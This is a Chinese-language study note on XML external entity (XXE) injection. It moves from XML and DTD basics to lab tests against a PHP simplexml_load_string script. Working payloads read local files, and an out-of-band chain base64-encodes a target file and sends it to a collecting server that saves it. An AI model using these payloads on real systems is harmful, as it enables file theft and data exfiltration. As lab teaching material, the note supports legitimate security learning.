XML的实体注入学习

关于xml

XML 指可扩展标记语言（EXtensible Markup Language）。是一种标记语言，类似于HTML。XML是用来传输数据的，而非显示数据。XML 标签没有被预定义。您需要自行定义标签。xml由五个部分构成（元素
，属性，实体，PCDATA，CDATA）

xml基础

<?xml version="1.0" encoding="ISO-8859-1"?>
<note>
<to>George</to>
<from>John</from>
<heading>Reminder</heading>
<body>Don't forget the meeting!</body>
</note>

xml的一个实例，第一行是xml的声明，包括版本信息和编码信息的设置
<note>为文档的根元素，根元素必须存在，它是所有子元素的父元素
<to> <from>等为根元素的子元素，例子中有四个子元素。
xml的所有元素都要有闭合标签，省略闭合标签就会报错
《XML详细学习》

xml实体引用

xml实体是xml的组成之一，在xml中会存在一些特殊意义的字符，比如xml的‘<’
如果出现在xml的元素中会存在解析错误，为了避免这个错误我们可以用实体引用来代替
xml中预定义的5中实体引用

&lt;	<	less than
&gt;	>	greater than
&amp;	&	ampersand
&apos;	'	apostrophe
&quot;	"	quotation mark

xml DTD（文档类型定义）

DTD可定义合法的XML文档构建模块，来验证xml是否合法。
DTD可被声明在xml的文档中，也可以作为一个外部引用

1. 当DTD在xml内部声明时，要用使用DOCTYPE语法包装声明

<!DOCTYPE 根元素 [元素声明]>

例如

<?xml version="1.0"?>
<!DOCTYPE note [        定义此文档是 note 类型的文档。
  <!ELEMENT note (to,from,heading,body)>    定义 note 元素有四个元素："to、from、heading,、body"
  <!ELEMENT to      (#PCDATA)>   定义 to 元素为 "#PCDATA" 类型
  <!ELEMENT from    (#PCDATA)>     
  <!ELEMENT heading (#PCDATA)>
  <!ELEMENT body    (#PCDATA)>
]>
<note>
  <to>George</to>
  <from>John</from>
  <heading>Reminder</heading>
  <body>Don't forget the meeting!</body>
</note>

2. 当DTD位于xml文档外部，引用方法

<!DOCTYPE 根元素 SYSTEM "文件名">

xml文档

<?xml version="1.0"?>
<!DOCTYPE note SYSTEM "note.dtd">
<note>
<to>George</to>
<from>John</from>
<heading>Reminder</heading>
<body>Don't forget the meeting!</body>
</note> 

DTD文档

<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>

DTD构建实体

1. 内部实体声明

<!ENTITY 实体名称 "实体的值">

一个实体由三部分构成: 一个和号 (&), 一个实体名称, 以及一个分号 (;)
DTD实体声明

<!ENTITY writer "Bill Gates">
<!ENTITY copyright "Copyright W3School.com.cn">

xml调用

<author>&writer;&copyright;</author>

2. 外部实体声明

<!ENTITY 实体名称 SYSTEM "URI/URL">

DTD实体声明

<!ENTITY writer SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">
<!ENTITY copyright SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">

xml调用

<author>&writer;&copyright;</author>

xml实体注入利用

使用php进行测试，php版本为5.4.45。

有回显测试

<?php
$xml=$_GET['xml'];
$data = @simplexml_load_string($xml);
print_r($data);
?>

simplexml_load_string()转换形式良好的 XML 字符串为 SimpleXMLElement 对象，然后输出对象的键和元素（php，python，java等都有类似函数）

0x01使用xml外部实体读取本地文件

payload

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [<!ENTITY  file SYSTEM "file:///c:/Windows/win.ini">]>
<note>&file;</note>

把自己的windows作为了靶机，读取的是win.ini文件
将payload进行url编码传入

读取win.ini文件

0x02 xml引用外部实体(引用DTD文件)

因为在本地测试，使用的时候用的是本地虚拟机当服务器，存放文件进行引用

payload

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE  note [<!ENTITY  % a SYSTEM "http://192.168.8.132/html/dtdfile.dtd"> %a;]>
<note>&file;</note>

DTD(dtdfile.dtd)

<!ENTITY file SYSTEM "file:///c:/Windows/win.ini">

无回显测试

可以将结果打到服务器上，查看日志，或则将结果保存为文件（同样是在内网，使用虚拟机测试）

测试文件

$xml=$_GET['xml'];
$data = @simplexml_load_string($xml);

在自己服务器建立xml文件（2.xml）用于引用

<!ENTITY % payload   SYSTEM   "php://filter/read=convert.base64-encode/resource=file:///c:/Windows/win.ini">
<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://192.168.8.132/html/get.php?id=%payload;'>"> 
%int;
%trick;

读取的攻击目标文件内容时，使用的php://filter将文件内容进行了base64编码，因为当我们读取的文件是php或则html文件时，文件的代码包含< >符号时会导致解析错误

同目录下建立php(get.php)用于接受并且保存读取的文件

<?php
file_put_contents('test/1.txt',$_GET['id']);
?>
#在测试时发现file_put_contents()写入权限不够，所以建了一个test文件夹，并给777权限

payload

<!DOCTYPE root[
<!ENTITY % remote SYSTEM "http://192.168.8.132/html/2.xml"> 
%remote;]>
<root/>

在请求中引用2.xml文件，2.xml中读取攻击目标内容，并将内容以http请求参数的方式打回自己的服务器。在自己服务器上创建get.php，get.php接受请求并将参数内容保存为txt文档
查看日志和文档我们都能看到结果

日志文件 txt文件

因为文件的内容是经过base64编码的，所以可以通过解码查看获取的内容

xml支持的各种协议方法

xml不仅可以任意读取文件，执行系统命令，探测内网端口和攻击内网网站

参考blog
XML实体注入漏洞有关于另外xxe攻击的pyload和防御方法
XML实体注入漏洞攻与防
小试XML实体注入攻击
XML实体注入漏洞的利用与学习